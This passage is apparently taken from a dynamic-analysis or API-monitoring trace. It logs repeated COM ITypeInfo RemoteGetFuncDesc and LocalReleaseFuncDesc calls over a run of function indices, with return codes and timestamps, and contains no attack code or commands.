ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x60, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x61, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x62, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x63, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x64, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x65, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x66, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x67, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x68, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x69, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6a, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6b, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6c, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6d, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6e, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6f, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x70, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x71, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x72, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x73, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.320] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x74, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x75, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x76, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x77, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x78, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x79, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7a, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7b, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7c, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7d, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7e, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7f, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x80, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x81, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x82, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x83, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x84, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.321] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x85, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.321] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x86, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x87, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x88, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x89, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8a, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8b, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8c, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8d, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8e, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8f, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x90, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x91, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x92, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x93, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x94, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x95, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x96, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x97, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.322] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x98, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.322] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x99, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9a, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9b, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9c, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9d, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9e, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9f, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa0, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa1, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa2, ppFuncDesc=0x145df8, pDummy=0x460 | out: ppFuncDesc=0x145df8, pDummy=0x460) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa3, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa4, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa5, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa6, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa7, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa8, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa9, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xaa, ppFuncDesc=0x145df8, pDummy=0x460 | out: ppFuncDesc=0x145df8, pDummy=0x460) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xab, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.323] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.323] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xac, ppFuncDesc=0x145df8, pDummy=0x460 | out: ppFuncDesc=0x145df8, pDummy=0x460) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xad, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xae, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xaf, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb0, ppFuncDesc=0x145df8, pDummy=0x460 | out: ppFuncDesc=0x145df8, pDummy=0x460) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb1, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb2, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb3, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb4, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb5, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb6, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb7, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb8, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb9, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xba, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbb, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbc, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbd, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.324] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.324] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbe, ppFuncDesc=0x145df8, pDummy=0x460 | out: ppFuncDesc=0x145df8, pDummy=0x460) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbf, ppFuncDesc=0x145df8, pDummy=0x460 | out: ppFuncDesc=0x145df8, pDummy=0x460) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc0, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc1, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc2, ppFuncDesc=0x145df8, pDummy=0x460 | out: ppFuncDesc=0x145df8, pDummy=0x460) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc3, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc4, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc5, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc6, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc7, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] 